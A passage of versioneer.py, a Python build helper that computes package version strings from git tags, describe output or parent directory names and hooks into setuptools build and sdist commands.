def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we do not want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %%d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%%s', no digits" %% ",".join(refs - tags))
if verbose:
print("likely tags: %%s" %% ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %%s" %% r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py has not already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %%s not under git control" %% root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there is not one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%%s*" %% tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%%s'"
%% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%%s' does not start with prefix '%%s'"
print(fmt %% (full_tag, tag_prefix))
pieces["error"] = ("tag '%%s' does not start with prefix '%%s'"
%% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we do not already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%%d.g%%s" %% (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%%d.g%%s" %% (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%%d" %% pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%%d" %% pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you should not be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%%s" %% pieces["short"]
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%%s" %% pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%%d" %% pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%%d-g%%s" %% (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%%s'" %% style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations do not do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
'''
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we do not want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py has not already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there is not one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' does not start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' does not start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def do_vcs_install(manifest_in, versionfile_source, ipy):
"""Git-specific installation logic for Versioneer.
For Git, this means creating/changing .gitattributes to mark _version.py
for export-subst keyword substitution.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
files = [manifest_in, versionfile_source]
if ipy:
files.append(ipy)
try:
me = __file__
if me.endswith(".pyc") or me.endswith(".pyo"):
me = os.path.splitext(me)[0] + ".py"
versioneer_file = os.path.relpath(me)
except NameError:
versioneer_file = "versioneer.py"
files.append(versioneer_file)
present = False
try:
f = open(".gitattributes", "r")
for line in f.readlines():
if line.strip().startswith(versionfile_source):
if "export-subst" in line.strip().split()[1:]:
present = True
f.close()
except EnvironmentError:
pass
if not present:
f = open(".gitattributes", "a+")
f.write("%s export-subst\n" % versionfile_source)
f.close()
files.append(".gitattributes")
run_command(GITS, ["add", "--"] + files)
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir does not start with parentdir_prefix")
SHORT_VERSION_PY = """
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json
version_json = '''
%s
''' # END VERSION_JSON
def get_versions():
return json.loads(version_json)
"""
def versions_from_file(filename):
"""Try to determine the version from _version.py if present."""
try:
with open(filename) as f:
contents = f.read()
except EnvironmentError:
raise NotThisMethod("unable to read _version.py")
mo = re.search(r"version_json = '''\n(.*)''' # END VERSION_JSON",
contents, re.M | re.S)
if not mo:
mo = re.search(r"version_json = '''\r\n(.*)''' # END VERSION_JSON",
contents, re.M | re.S)
if not mo:
raise NotThisMethod("no version_json in _version.py")
return json.loads(mo.group(1))
def write_to_version_file(filename, versions):
"""Write the given version number to the given _version.py file."""
os.unlink(filename)
contents = json.dumps(versions, sort_keys=True,
indent=1, separators=(",", ": "))
with open(filename, "w") as f:
f.write(SHORT_VERSION_PY % contents)
print("set %s to '%s'" % (filename, versions["version"]))
def plus_or_dot(pieces):
"""Return a + if we do not already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you should not be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
class VersioneerBadRootError(Exception):
"""The project root directory is unknown or missing key files."""
def get_versions(verbose=False):
"""Get the project version from whatever source is available.
Returns dict with two keys: 'version' and 'full'.
"""
if "versioneer" in sys.modules:
# see the discussion in cmdclass.py:get_cmdclass()
del sys.modules["versioneer"]
root = get_root()
cfg = get_config_from_root(root)
assert cfg.VCS is not None, "please set [versioneer]VCS= in setup.cfg"
handlers = HANDLERS.get(cfg.VCS)
assert handlers, "unrecognized VCS '%s'" % cfg.VCS
verbose = verbose or cfg.verbose
assert cfg.versionfile_source is not None, \
"please set versioneer.versionfile_source"
assert cfg.tag_prefix is not None, "please set versioneer.tag_prefix"
versionfile_abs = os.path.join(root, cfg.versionfile_source)
# extract version from first of: _version.py, VCS command (e.g. 'git
# describe'), parentdir. This is meant to work for developers using a
# source checkout, for users of a tarball created by 'setup.py sdist',
# and for users of a tarball/zipball created by 'git archive' or github's
# download-from-tag feature or the equivalent in other VCSes.
get_keywords_f = handlers.get("get_keywords")
from_keywords_f = handlers.get("keywords")
if get_keywords_f and from_keywords_f:
try:
keywords = get_keywords_f(versionfile_abs)
ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)
if verbose:
print("got version from expanded keyword %s" % ver)
return ver
except NotThisMethod:
pass
try:
ver = versions_from_file(versionfile_abs)
if verbose:
print("got version from file %s %s" % (versionfile_abs, ver))
return ver
except NotThisMethod:
pass
from_vcs_f = handlers.get("pieces_from_vcs")
if from_vcs_f:
try:
pieces = from_vcs_f(cfg.tag_prefix, root, verbose)
ver = render(pieces, cfg.style)
if verbose:
print("got version from VCS %s" % ver)
return ver
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
if verbose:
print("got version from parentdir %s" % ver)
return ver
except NotThisMethod:
pass
if verbose:
print("unable to compute version")
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None, "error": "unable to compute version",
"date": None}
def get_version():
"""Get the short version string for this project."""
return get_versions()["version"]
def get_cmdclass():
"""Get the custom setuptools/distutils subclasses used by Versioneer."""
if "versioneer" in sys.modules:
del sys.modules["versioneer"]
# this fixes the "python setup.py develop" case (also 'install' and
# 'easy_install .'), in which subdependencies of the main project are
# built (using setup.py bdist_egg) in the same python process. Assume
# a main project A and a dependency B, which use different versions
# of Versioneer. A's setup.py imports A's Versioneer, leaving it in
# sys.modules by the time B's setup.py is executed, causing B to run
# with the wrong versioneer. Setuptools wraps the sub-dep builds in a
# sandbox that restores sys.modules to it's pre-build state, so the
# parent is protected against the child's "import versioneer". By
# removing ourselves from sys.modules here, before the child build
# happens, we protect the child from the parent's versioneer too.
# Also see https://github.com/warner/python-versioneer/issues/52
cmds = {}
# we add "version" to both distutils and setuptools
from distutils.core import Command
class cmd_version(Command):
description = "report generated version string"
user_options = []
boolean_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
vers = get_versions(verbose=True)
print("Version: %s" % vers["version"])
print(" full-revisionid: %s" % vers.get("full-revisionid"))
print(" dirty: %s" % vers.get("dirty"))
print(" date: %s" % vers.get("date"))
if vers["error"]:
print(" error: %s" % vers["error"])
cmds["version"] = cmd_version
# we override "build_py" in both distutils and setuptools
#
# most invocation pathways end up running build_py:
# distutils/build -> build_py
# distutils/install -> distutils/build ->..
# setuptools/bdist_wheel -> distutils/install ->..
# setuptools/bdist_egg -> distutils/install_lib -> build_py
# setuptools/install -> bdist_egg ->..
# setuptools/develop -> ?
# pip install:
# copies source tree to a tempdir before running egg_info/etc
# if .git is not copied too, 'git describe' will fail
# then does setup.py bdist_wheel, or sometimes setup.py install
# setup.py egg_info -> ?
# we override different "build_py" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.build_py import build_py as _build_py
else:
from distutils.command.build_py import build_py as _build_py
class cmd_build_py(_build_py):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
_build_py.run(self)
# now locate _version.py in the new build/ directory and replace
# it with an updated value
if cfg.versionfile_build:
target_versionfile = os.path.join(self.build_lib,
cfg.versionfile_build)
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
cmds["build_py"] = cmd_build_py
if "cx_Freeze" in sys.modules: # cx_freeze enabled?
from cx_Freeze.dist import build_exe as _build_exe
# nczeczulin reports that py2exe will not like the pep440-style string
# as FILEVERSION, but it can be used for PRODUCTVERSION, e.g.
# setup(console=[{
# "version": versioneer.get_version().split("+", 1)[0], # FILEVERSION
# "product_version": versioneer.get_version(),
# ...
class cmd_build_exe(_build_exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_build_exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
cmds["build_exe"] = cmd_build_exe
del cmds["build_py"]
if 'py2exe' in sys.modules: # py2exe enabled?
try:
from py2exe.distutils_buildexe import py2exe as _py2exe # py3
except ImportError:
from py2exe.build_exe import py2exe as _py2exe # py2
class cmd_py2exe(_py2exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_py2exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
cmds["py2exe"] = cmd_py2exe
# we override different "sdist" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.sdist import sdist as _sdist
else:
from distutils.command.sdist import sdist as _sdist
class cmd_sdist(_sdist):
def run(self):
versions = get_versions()
self._versioneer_generated_versions = versions
# unless we update this, the command will keep using the old
# version
self.distribution.metadata.version = versions["version"]
return _sdist.run(self)
def make_release_tree(self, base_dir, files):
root = get_root()
cfg = get_config_from_root(root)
_sdist.make_release_tree(self, base_dir, files)
# now locate _version.py in the new base_dir directory
# (remembering that it may be a hardlink) and replace it with an
# updated value
target_versionfile = os.path.join(base_dir, cfg.versionfile_source)
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile,
self._versioneer_generated_versions)
cmds["sdist"] = cmd_sdist
return cmds
CONFIG_ERROR = """
setup.cfg is missing the necessary Versioneer configuration. You need
a section like:
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
You will also need to edit your setup.py to use the results:
import versioneer
setup(version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(), ...)
Please read the docstring in ./versioneer.py for configuration instructions,
edit setup.cfg, and re-run the installer or 'python versioneer.py setup'.
"""
SAMPLE_CONFIG = """
# See the docstring in versioneer.py for instructions. Note that you must
# re-run 'versioneer.py setup' after changing this section, and commit the
# resulting files.
[versioneer]
#VCS = git
#style = pep440
#versionfile_source =
#versionfile_build =
#tag_prefix =
#parentdir_prefix =
"""
INIT_PY_SNIPPET = """
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
"""
def do_setup():
"""Main VCS-independent setup function for installing Versioneer."""
root = get_root()
try:
